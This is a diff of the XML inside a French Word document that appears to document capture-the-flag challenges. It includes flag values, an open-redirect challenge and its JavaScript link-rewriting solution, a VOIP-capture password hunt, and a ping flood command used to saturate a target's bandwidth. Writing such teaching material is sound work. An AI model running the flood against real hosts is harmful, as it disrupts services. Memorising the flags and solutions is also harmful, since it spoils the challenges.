+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille B : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Hosttorvpn12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="705"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> : </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Open_Redirect</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / http-030</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Catégorie </w:t>
+      </w:r>
+      <w:r>
+        <w:t>: http</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Objectif </w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Réussir à faire une redirection vers un autre domaine pour débloquer le flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Description :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Le challenger doit retrouver le doit trouver le flag en faisant une redirection vers un autre domaine. La page présente 3 boutons vers des sites connus, Facebook, Twitter, et Slack.fr. Les boutons contiennent un lien de redirection qui est associé à un hash de l’adresse</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="541EBF5D" wp14:editId="3AA047AD">
+            <wp:extent cx="5760720" cy="953587"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="31" name="Image 31"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5760720" cy="953587"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -13774,13 +13928,8 @@
         <w:t>Flag team A :</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> root</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13794,13 +13943,8 @@
         <w:t>Flag team B :</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> admin</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14833,7 +14977,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -14900,27 +15044,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> « </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>ping</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -i 0 -s 65000 IP » à partir de plusieurs terminaux pour monter à un débit de 10mb/s</w:t>
+        <w:t xml:space="preserve"> « ping -i 0 -s 65000 IP » à partir de plusieurs terminaux pour monter à un débit de 10mb/s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15200,27 +15324,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Il faut inspecter les historiques de conversations et </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>trouver</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> l'identifiant et mot de passe administrateur.</w:t>
+        <w:t>L’utilisateur possède une archive contenant plusieurs trames contenant des historiques de conversation VOIP il doit trouver le mot de passe administrateur</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15254,6 +15358,48 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FD05F0" wp14:editId="50BEEC27">
+            <wp:extent cx="5760720" cy="2169795"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="33" name="Image 33"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="2169795"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:bookmarkStart w:id="24" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="24"/>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -15271,6 +15417,15 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Une des trames contient l’identifiant et le mot de passe administrateur.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15615,7 +15770,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -15662,7 +15817,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Utiliser une fonction </w:t>
+        <w:t xml:space="preserve">Utiliser une fonction javascript pour </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -15672,7 +15827,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>javascript</w:t>
+        <w:t>decrypter</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -15682,17 +15837,18 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pour </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>decrypter</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>tout</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -15702,37 +15858,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>tout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>les lien</w:t>
+        <w:t xml:space="preserve"> les lien</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -15776,7 +15902,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15787,7 +15912,6 @@
         <w:t>var</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15798,6 +15922,7 @@
         <w:t xml:space="preserve"> links = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15808,6 +15933,7 @@
         <w:t>document.getElementsByTagName</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15848,7 +15974,6 @@
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15856,9 +15981,9 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>for (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15866,9 +15991,9 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15876,9 +16001,9 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15886,9 +16011,9 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> i = 0; i &lt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15896,9 +16021,9 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>links.length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> = 0; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15906,7 +16031,59 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">; i++) { </w:t>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>links.length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">++) { </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15958,7 +16135,6 @@
         <w:tab/>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15969,7 +16145,6 @@
         <w:t>var</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15977,7 +16152,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> data= links[i].</w:t>
+        <w:t xml:space="preserve"> data= links[</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -15987,9 +16162,10 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>href.replace</w:t>
+        <w:t>i</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15997,9 +16173,39 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
+        <w:t>].</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>href</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>.replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
         <w:t>('</w:t>
       </w:r>
-      <w:hyperlink r:id="rId33" w:history="1">
+      <w:hyperlink r:id="rId36" w:history="1">
         <w:r>
           <w:rPr>
             <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -16069,8 +16275,9 @@
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>links[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -16078,9 +16285,10 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>links[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -16088,7 +16296,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>i].</w:t>
+        <w:t>].</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -16101,6 +16309,7 @@
         <w:t>setAttribute</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -16158,8 +16367,9 @@
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>links[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -16167,9 +16377,10 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>links[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -16177,7 +16388,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>i].</w:t>
+        <w:t>].</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -16190,6 +16401,7 @@
         <w:t>href</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -16217,7 +16429,27 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>(links[i].</w:t>
+        <w:t>(links[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>].</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -16638,7 +16870,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -17074,7 +17306,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -17161,27 +17393,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pour lancer des commandes en </w:t>
-      </w:r>
